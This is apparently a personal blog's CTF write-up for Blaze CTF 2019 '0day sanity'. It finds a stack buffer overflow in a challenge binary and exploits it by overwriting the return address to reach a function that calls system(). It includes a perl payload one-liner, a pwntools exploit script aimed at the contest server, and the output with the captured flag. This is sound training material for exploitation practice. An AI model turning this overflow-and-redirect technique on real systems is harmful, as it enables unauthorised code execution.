Unleash the Beast!

CTFなどのメモに使います

Blaze CTF 2019 - 0day sanity

f:id:imurasheen:20190501021155p:plain

After I connect to the server, it requires base64-encoded data.

So I send "Bz==" to observe the behavior. The result is following.

****************
root@kali:~# nc chal.420blaze.in 42004
Give me a file (base64 encoded, followed by a newline):

Bz==
b'\x07'
thanks, time to pwn
your very own home: /tmp/tmppeijv007
analyzing your file.............
�sm0ke
time's up!
root@kali:~#
****************

 

[Vulnerability identification]

And there is the binary file: "chal"

Decompile the "chal" by Ghidra, I found the vuln() function.

vuln() is...

(1) Open the file which specified by the command-line of "chal".

    -> fopen() is used.

(2) Read the 0x100 bytes data from the file to the buffer.

    -> fread() is used.

(3) Output the data of (2) by printf().

 

At (2), the length of buffer is 128 bytes.

It is shorter than the read bytes. So there is the vulnerability of BoF.

 

I  send the long-base64-encoded string to the Server.

->As I expected, Segmentation fault happened.

   After 145th byte of input can be overwritten the return address of vuln().

 

[Exploit]

I found the dont_mind_me() function at 0x8048506 of the "chal".

It calls system() function.

In the local environment, I can get the shell by the following procedure.

************************
root@kali:~/CTF# perl -e 'print "A"x144 . "\x06\x85\x04\x08" . "\n"' > flag3.txt
root@kali:~/CTF# ./chal flag3.txt
#
************************

The script for remote enviornment is following.

Note: The place of the flag.txt is described in Notification. -> /home/pwn/flag.txt

************************
# coding:utf-8
from pwn import *

host = "chal.420blaze.in"
port = 42004

r = remote(host, port)

message = r.recvuntil("followed by a newline):")
r.recvline()
r.recvline()
print(message)

code = "A" * 144 # dummy
code += p32(0x8048506)
#code += "\n"
print(code)
print(b64e(code))
r.sendline(b64e(code))
r.sendline("\n")
r.sendline("cat /home/pwn/flag.txt\n")

r.interactive()
********************************

The result is...

********************************
root@kali:~# python solve_Blaze.py
[+] Opening connection to chal.420blaze.in on port 42004: Done
Give me a file (base64 encoded, followed by a newline):
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x06\x85\x0
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBBoUECA==
[*] Switching to interactive mode
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x06\x85\x04\x08'
thanks, time to pwn
your very own home: /tmp/tmpr_pjqy7v
analyzing your file.............
blaze{gratz_on_teh_l33t_smoked_0day}

============= NICE HIT =============


[*] Got EOF while reading in interactive
$
**************************************

Flag is: blaze{gratz_on_teh_l33t_smoked_0day}